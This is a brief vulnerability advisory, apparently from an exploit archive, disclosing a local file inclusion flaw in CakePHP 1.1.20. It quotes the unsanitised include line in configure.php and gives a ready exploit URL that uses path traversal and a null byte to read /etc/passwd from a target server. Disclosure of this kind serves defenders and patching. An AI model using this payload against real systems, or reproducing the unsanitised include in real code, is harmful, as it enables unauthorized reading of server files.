Cru3l.b0yPACKETSTORM:78936
` ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ CakePHP 1.1.20 Local File Inclusion Vulnerability +
+ +
+ Discovered by Cru3l.b0y +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###################################################################################################
AUTHOR : Cru3l.b0y
APPLICATION : CakePHP
VERSION : 1.1.20
DOWNLOAD : http://cakeforge.org/frs/download.php/677/cake_1.1.20.7692.tar.gz/donation=complete
VENDOR : http://cakeforge.org/
###################################################################################################
Vulnerable Code :
###################################################################################################
/cake/libs/configure.php
215 include(CONFIGS . $fileName . '.php');
[+]Exploit: http://[t4rg3t]/[p4th]/cake/libs/configure.php?fileName=../../../etc/passwd%00
###################################################################################################
`